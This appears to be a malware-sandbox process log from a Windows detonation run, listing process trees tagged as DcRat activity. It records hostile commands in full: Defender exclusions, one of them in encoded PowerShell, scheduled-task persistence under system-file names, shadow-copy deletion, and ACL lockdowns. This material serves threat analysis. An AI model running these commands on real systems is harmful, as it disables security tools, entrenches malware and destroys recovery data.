- - C:\Users\Admin\Desktop\a\dollzx.exe
    "C:\Users\Admin\Desktop\a\dollzx.exe"
    3⤵
    PID:2040
- C:\Users\Admin\Desktop\a\plugmanzx.exe
  "C:\Users\Admin\Desktop\a\plugmanzx.exe"
  2⤵
  PID:5912
- - C:\Users\Admin\Desktop\a\plugmanzx.exe
    "C:\Users\Admin\Desktop\a\plugmanzx.exe"
    3⤵
    PID:208
- - C:\Users\Admin\Desktop\a\plugmanzx.exe
    "C:\Users\Admin\Desktop\a\plugmanzx.exe"
    3⤵
    PID:4456
- C:\Users\Admin\Desktop\a\HKA6kdXx7NGuWbk.exe
  "C:\Users\Admin\Desktop\a\HKA6kdXx7NGuWbk.exe"
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GpQBqLUUSTgf.exe"
    3⤵
    PID:192
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GpQBqLUUSTgf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp38C4.tmp"
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:4296
- - C:\Users\Admin\Desktop\a\HKA6kdXx7NGuWbk.exe
    "C:\Users\Admin\Desktop\a\HKA6kdXx7NGuWbk.exe"
    3⤵
    PID:312
- C:\Users\Admin\Desktop\a\5ea275.exe
  "C:\Users\Admin\Desktop\a\5ea275.exe"
  2⤵
  PID:5300
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN 5ea275.exe /TR "C:\Users\Admin\Desktop\a\5ea275.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:4544
- C:\Users\Admin\Desktop\a\Server.exe
  "C:\Users\Admin\Desktop\a\Server.exe"
  2⤵
  PID:2888
- C:\Users\Admin\Desktop\a\chungzx.exe
  "C:\Users\Admin\Desktop\a\chungzx.exe"
  2⤵
  PID:224
- - C:\Users\Admin\Desktop\a\chungzx.exe
    "C:\Users\Admin\Desktop\a\chungzx.exe"
    3⤵
    PID:1852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
      4⤵
      PID:4624
    - - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:5656
    - - C:\Windows\Microsoft Media Session\Windows Session Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Session Start.exe"
        5⤵
        
        PID:1804
      - C:\Windows\Microsoft Media Session\Windows Session Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Session Start.exe"
        6⤵
        
        PID:6352
      - C:\Windows\Microsoft Media Session\Windows Session Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Session Start.exe"
        6⤵
        
        PID:6388
        
        C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        7⤵
        
        PID:6560
- C:\Users\Admin\Desktop\a\sicilyzx.exe
  "C:\Users\Admin\Desktop\a\sicilyzx.exe"
  2⤵
  PID:5160
- - C:\Users\Admin\Desktop\a\sicilyzx.exe
    "C:\Users\Admin\Desktop\a\sicilyzx.exe"
    3⤵
    PID:6036
- C:\Users\Admin\Desktop\a\Services.exe
  "C:\Users\Admin\Desktop\a\Services.exe"
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3404
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3484
- C:\Users\Admin\Desktop\a\DocRecevutta.exe
  "C:\Users\Admin\Desktop\a\DocRecevutta.exe"
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\setup.msi"
    3⤵
    PID:1344
- C:\Users\Admin\Desktop\a\calc2.exe
  "C:\Users\Admin\Desktop\a\calc2.exe"
  2⤵
  PID:4236
- C:\Users\Admin\Desktop\a\file.exe
  "C:\Users\Admin\Desktop\a\file.exe"
  2⤵
  PID:3900
- C:\Users\Admin\Desktop\a\set17.exe
  "C:\Users\Admin\Desktop\a\set17.exe"
  2⤵
  PID:5712
- - C:\Users\Admin\AppData\Local\Temp\is-9GSOE.tmp\is-5DBGJ.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-9GSOE.tmp\is-5DBGJ.tmp" /SL4 $20392 "C:\Users\Admin\Desktop\a\set17.exe" 1058974 52224
    3⤵
    PID:3644
  - - C:\Program Files (x86)\QD Previewer\previewer.exe
      "C:\Program Files (x86)\QD Previewer\previewer.exe" -i
      4⤵
      PID:2944
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" helpmsg 6
      4⤵
      PID:3816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 6
        5⤵
        
        PID:4472
  - - C:\Program Files (x86)\QD Previewer\previewer.exe
      "C:\Program Files (x86)\QD Previewer\previewer.exe" -s
      4⤵
      PID:5584
- C:\Users\Admin\Desktop\a\winlog.exe
  "C:\Users\Admin\Desktop\a\winlog.exe"
  2⤵
  PID:4760
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:6088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:5600
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffba2379758,0x7ffba2379768,0x7ffba2379778
    3⤵
    PID:4912
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:8
    3⤵
    PID:3792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:8
    3⤵
    PID:2076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:2
    3⤵
    PID:4396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2888 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:1
    3⤵
    PID:1896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2864 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:1
    3⤵
    PID:5728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4352 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:1
    3⤵
    PID:3620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:8
    3⤵
    PID:5724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1848,i,6099105382369811244,11617286461869299972,131072 /prefetch:8
    3⤵
    PID:2964
- C:\Users\Admin\Desktop\a\aafg31.exe
  "C:\Users\Admin\Desktop\a\aafg31.exe"
  2⤵
  PID:5828
- C:\Users\Admin\Desktop\a\ummaa.exe
  "C:\Users\Admin\Desktop\a\ummaa.exe"
  2⤵
  PID:3736
- - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
    3⤵
    PID:404
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:1112
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
      4⤵
      PID:3656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2484
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        5⤵
        
        PID:5792
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        5⤵
        
        PID:6868
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:6600
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        5⤵
        
        PID:6700
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:R" /E
        5⤵
        
        PID:988
  - - C:\Users\Admin\AppData\Local\Temp\1000307001\chrome.exe
      "C:\Users\Admin\AppData\Local\Temp\1000307001\chrome.exe"
      4⤵
      PID:4496
  - - C:\Users\Admin\AppData\Local\Temp\1000308001\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\1000308001\toolspub2.exe"
      4⤵
      PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:4556
- C:\Users\Admin\Desktop\a\rockas.exe
  "C:\Users\Admin\Desktop\a\rockas.exe"
  2⤵
  PID:5008
- - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
    "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
    3⤵
    PID:4888
- C:\Users\Admin\Desktop\a\ela205.exe
  "C:\Users\Admin\Desktop\a\ela205.exe"
  2⤵
  PID:5692
- C:\Users\Admin\Desktop\a\UMR.exe
  "C:\Users\Admin\Desktop\a\UMR.exe"
  2⤵
  PID:960
- C:\Users\Admin\Desktop\a\4t.exe
  "C:\Users\Admin\Desktop\a\4t.exe"
  2⤵
  PID:320
- C:\Users\Admin\Desktop\a\taskhost.exe
  "C:\Users\Admin\Desktop\a\taskhost.exe"
  2⤵
  PID:2108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5260
- C:\Users\Admin\Desktop\a\Akhmin.exe
  "C:\Users\Admin\Desktop\a\Akhmin.exe"
  2⤵
  PID:2496
- C:\Users\Admin\Desktop\a\10.exe
  "C:\Users\Admin\Desktop\a\10.exe"
  2⤵
  PID:5628
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:6284
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      4⤵
      PID:6328
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4242DCD2-2814-47AE-AA14-E709BE979A6B}'" delete
        5⤵
        
        PID:6276
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4242DCD2-2814-47AE-AA14-E709BE979A6B}'" delete
        6⤵
        
        PID:6952
- C:\Users\Admin\Desktop\a\9.exe
  "C:\Users\Admin\Desktop\a\9.exe"
  2⤵
  PID:5992
- C:\Users\Admin\Desktop\a\8.exe
  "C:\Users\Admin\Desktop\a\8.exe"
  2⤵
  PID:5012
- C:\Users\Admin\Desktop\a\7.exe
  "C:\Users\Admin\Desktop\a\7.exe"
  2⤵
  PID:2360
- C:\Users\Admin\Desktop\a\6.exe
  "C:\Users\Admin\Desktop\a\6.exe"
  2⤵
  PID:6220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:6940
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      4⤵
      PID:3344
- C:\Users\Admin\Desktop\a\1.exe
  "C:\Users\Admin\Desktop\a\1.exe"
  2⤵
  PID:6540
- C:\Users\Admin\Desktop\a\3.exe
  "C:\Users\Admin\Desktop\a\3.exe"
  2⤵
  PID:6892
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:5144
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      4⤵
      PID:4120
- C:\Users\Admin\Desktop\a\4.exe
  "C:\Users\Admin\Desktop\a\4.exe"
  2⤵
  PID:3584
- C:\Users\Admin\Desktop\a\2.exe
  "C:\Users\Admin\Desktop\a\2.exe"
  2⤵
  PID:6380
- C:\Users\Admin\AppData\Roaming\scksp\Dashboard.exe
  "C:\Users\Admin\AppData\Roaming\scksp\Dashboard.exe"
  2⤵
  PID:6780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:2960
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      4⤵
      PID:7044
- C:\Users\Admin\Desktop\a\5.exe
  "C:\Users\Admin\Desktop\a\5.exe"
  2⤵
  PID:6888
- C:\Users\Admin\Desktop\a\easy.exe
  "C:\Users\Admin\Desktop\a\easy.exe"
  2⤵
  PID:660
- C:\Users\Admin\Desktop\a\toolspub2.exe
  "C:\Users\Admin\Desktop\a\toolspub2.exe"
  2⤵
  PID:3416
- C:\Users\Admin\Desktop\a\Mfceum-4.exe
  "C:\Users\Admin\Desktop\a\Mfceum-4.exe"
  2⤵
  PID:4412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
    3⤵
    PID:368
- C:\Users\Admin\Desktop\a\Ivnut-Z2K-2.exe
  "C:\Users\Admin\Desktop\a\Ivnut-Z2K-2.exe"
  2⤵
  PID:5800
- C:\Users\Admin\Desktop\a\Z2K-1.exe
  "C:\Users\Admin\Desktop\a\Z2K-1.exe"
  2⤵
  PID:2484
- C:\Users\Admin\Desktop\a\Rrobknnz-Z2K.exe
  "C:\Users\Admin\Desktop\a\Rrobknnz-Z2K.exe"
  2⤵
  PID:5388
- C:\Users\Admin\AppData\Roaming\ntlanman\Dashboard.exe
  "C:\Users\Admin\AppData\Roaming\ntlanman\Dashboard.exe"
  2⤵
  PID:5620
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:6512
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      4⤵
      PID:6820
- C:\Users\Admin\Desktop\a\HEXO-SOFTWARE-1.exe
  "C:\Users\Admin\Desktop\a\HEXO-SOFTWARE-1.exe"
  2⤵
  PID:6672
- C:\Users\Admin\Desktop\a\TPB-1.exe
  "C:\Users\Admin\Desktop\a\TPB-1.exe"
  2⤵
  PID:6960
- C:\Users\Admin\Desktop\a\Ivnut-Z2K-3.exe
  "C:\Users\Admin\Desktop\a\Ivnut-Z2K-3.exe"
  2⤵
  PID:164
- C:\Users\Admin\Desktop\a\overlaycrypt.exe
  "C:\Users\Admin\Desktop\a\overlaycrypt.exe"
  2⤵
  PID:1052
- C:\Users\Admin\Desktop\a\Moriwnrn.exe
  "C:\Users\Admin\Desktop\a\Moriwnrn.exe"
  2⤵
  PID:2788
- C:\Users\Admin\Desktop\a\buildp.exe
  "C:\Users\Admin\Desktop\a\buildp.exe"
  2⤵
  PID:2944
- - C:\Users\Admin\Desktop\a\buildp.exe
    "C:\Users\Admin\Desktop\a\buildp.exe"
    3⤵
    PID:6204
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\20c772e6-3464-4d27-b753-20763f54286c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:7412
- C:\Users\Admin\Desktop\a\autorun.exe
  "C:\Users\Admin\Desktop\a\autorun.exe"
  2⤵
  PID:6724
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 580
    3⤵
    - Program crash
    PID:4452
- C:\Users\Admin\Desktop\a\Install.exe
  "C:\Users\Admin\Desktop\a\Install.exe"
  2⤵
  PID:6392
- C:\Users\Admin\Desktop\a\newbin.exe
  "C:\Users\Admin\Desktop\a\newbin.exe"
  2⤵
  PID:3996
- C:\Users\Admin\Desktop\a\Asd11.exe
  "C:\Users\Admin\Desktop\a\Asd11.exe"
  2⤵
  PID:7012
- C:\Users\Admin\Desktop\a\BelgiumchainAGRO.exe
  "C:\Users\Admin\Desktop\a\BelgiumchainAGRO.exe"
  2⤵
  PID:8068
- C:\Users\Admin\Desktop\a\isoHost.exe
  "C:\Users\Admin\Desktop\a\isoHost.exe"
  2⤵
  PID:7188
- C:\Users\Admin\Desktop\a\v16p1gseo3t8fb.exe
  "C:\Users\Admin\Desktop\a\v16p1gseo3t8fb.exe"
  2⤵
  PID:7552
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\odt\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\odt\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\odt\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Photo Viewer\ja-JP\SearchUI.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\ja-JP\SearchUI.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\ja-JP\SearchUI.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ss41s" /sc MINUTE /mo 12 /tr "'C:\webRef\ss41.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ss41" /sc ONLOGON /tr "'C:\webRef\ss41.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ss41s" /sc MINUTE /mo 8 /tr "'C:\webRef\ss41.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "aa" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\a.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\a.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "aa" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\a.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\odt\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Desktop\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\Desktop\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Desktop\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "aa" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\a.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\a.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "aa" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\a.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Public\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\SendTo\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\SendTo\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Portable Devices\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Program Files\VideoLAN\VLC\skins\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\skins\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2936

